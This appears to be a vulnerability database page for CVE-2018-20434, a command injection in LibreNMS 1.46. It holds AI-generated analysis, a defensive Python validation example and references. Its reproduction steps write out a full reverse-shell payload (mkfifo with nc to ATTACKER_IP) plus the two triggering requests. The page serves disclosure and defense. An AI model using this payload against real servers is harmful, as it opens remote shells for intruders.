CVE-2018-20434
Description
LibreNMS 1.46 has an authenticated remote code execution vulnerability via unsanitized community parameter in addhost.inc.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability Overview
CVE-2018-20434 affects LibreNMS version 1.46, an open-source network monitoring system. The vulnerability is a command injection flaw that allows an authenticated attacker to execute arbitrary OS commands. The root cause lies in the html/pages/addhost.inc.php script, which accepts the $_POST['community'] parameter without proper sanitization when creating a new device. This unsanitized input is later passed to a popen() call in capture.inc.php, leading to remote code execution [1][2].
Exploitation Scenario
The attack requires valid credentials to the LibreNMS web interface. An attacker first sends a crafted POST request to addhost.inc.php with a malicious command embedded in the community field. Subsequently, the attacker makes a request to /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost, which triggers the capture.inc.php script. That script uses popen() to execute the unsanitized command, allowing the injected OS command to run on the server [1][2]. The public exploit code (published by researcher Askar) demonstrates this two-step process [2].
Impact
Successful exploitation gives the attacker the ability to execute arbitrary operating system commands with the privileges of the web server user (typically www-data). This can lead to full compromise of the LibreNMS server, including data exfiltration, lateral movement within the network, and potential control over monitored devices [1][3].
Mitigation Status
The issue is patched in versions after LibreNMS 1.46. Administrators should upgrade to a supported release. For those unable to upgrade, ensure that the community parameter is properly sanitized or restrict access to the addhost functionality [3][4]. The vulnerability has been publicly disclosed, and a proof-of-concept exploit is available, so immediate patching is strongly recommended [1][2].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- ghsa-coords
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The `community` parameter from device creation is not sanitized before being interpolated into an OS command in `capture.inc.php`, allowing OS command injection."
Attack vector
An authenticated attacker first sends a POST request to `/addhost/` with a malicious `community` parameter containing shell metacharacters (e.g., `'$(command) #`) to create a new device [ref_id=1]. The attacker then requests `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost`, which causes `capture.inc.php` to execute an SNMP command that includes the unsanitized community string, resulting in arbitrary OS command execution [CWE-78] [ref_id=1]. The exploit requires valid session cookies and the ability to create a device in LibreNMS [ref_id=1].
Affected code
The vulnerable code path involves `html/pages/addhost.inc.php` (device creation) and `html/includes/output/capture.inc.php` (command execution). The `$_POST['community']` parameter passed during device creation is later used unsanitized in an OS command within `capture.inc.php`, which is invoked via `html/ajax_output.php` when `$_REQUEST['id']` equals `"capture"` [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory does not specify a fix, but the remediation would require proper sanitization or escaping of the `community` parameter before it is interpolated into an OS command in `capture.inc.php`, and/or validating that the community string contains only safe characters [CWE-78]. Users should upgrade to a version of LibreNMS later than 1.46 if a fix has been released.
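The remediation described above, as an added example (not LibreNMS code and not taken from the advisory): validate the community string against an allow-list, build the SNMP command without shell interpolation, and audit already-stored device rows, since the value is saved at device creation and only used later. The snmpwalk argument layout, the allow-list pattern, the function names and the sample rows are assumptions constructed for illustration.

```python
import re
import shlex

# Assumed policy: conservative allow-list for SNMP community strings.
# Real deployments may need to widen it; the point is that quotes, '$',
# parentheses, spaces and '#' are never accepted.
SAFE_COMMUNITY = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.@:-]{0,63}")


def is_safe_community(value):
    """True only if the entire string matches the allow-list."""
    return SAFE_COMMUNITY.fullmatch(value) is not None


def snmpwalk_argv(community, hostname):
    """Argument vector for execution without a shell (no string interpolation)."""
    if not is_safe_community(community):
        raise ValueError("community string rejected by allow-list")
    return ["snmpwalk", "-v2c", "-c", community, hostname]


def snmpwalk_shell_string(community, hostname):
    """For code paths that must hand one string to a shell, as popen() does:
    each value is quoted so the shell treats it as a single literal word."""
    return "snmpwalk -v2c -c {} {}".format(
        shlex.quote(community), shlex.quote(hostname)
    )


def audit_devices(rows):
    """Hostnames whose stored community string fails validation."""
    return [r["hostname"] for r in rows if not is_safe_community(r["community"])]


# Constructed sample rows; the second uses the metacharacter pattern
# quoted on this page, with a placeholder instead of a real command.
SAMPLE_DEVICES = [
    {"hostname": "core-sw1", "community": "public"},
    {"hostname": "localhost", "community": "'$(command) #"},
    {"hostname": "edge-rtr2", "community": "mon_ro-2018"},
]

if __name__ == "__main__":
    print("flagged devices:", audit_devices(SAMPLE_DEVICES))
    print(snmpwalk_shell_string("'$(command) #", "localhost"))
```

Validation at input time and quoting at execution time are complementary: the audit catches rows stored before validation existed, and the quoting protects the command even if a bad value reaches it.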
Preconditions
- auth: Attacker must have valid authenticated session cookies for LibreNMS
- input: Attacker must be able to create a new device (POST to /addhost/)
- input: The community parameter must contain shell metacharacters (e.g., single quote, command substitution)
- config: The target LibreNMS instance must be version 1.46
Reproduction
1. Authenticate to LibreNMS and capture session cookies.
2. Send a POST request to `/addhost/` with `community` set to a payload such as `'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f) #` and other required fields (hostname, snmp=on, snmpver=v2c, etc.) [ref_id=1].
3. Send a GET request to `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost` using the same session cookies [ref_id=1].
4. The command executes; a reverse shell connects back to the attacker's listener [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-62q7-qj6g-gvr7 (ghsa, ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2018-20434 (ghsa, ADVISORY)
- packetstormsecurity.com/files/153188/LibreNMS-addhost-Command-Injection.html (mitre, x_refsource_MISC)
- packetstormsecurity.com/files/153448/LibreNMS-1.46-addhost-Remote-Code-Execution.html (mitre, x_refsource_MISC)
- drive.google.com/file/d/1LcGmOY8x-TG-wnNr-cM_f854kxk0etva/view (ghsa, x_refsource_MISC, WEB)
- gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d (ghsa, x_refsource_MISC, WEB)
- shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434 (ghsa, WEB)
- shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/ (mitre, x_refsource_MISC)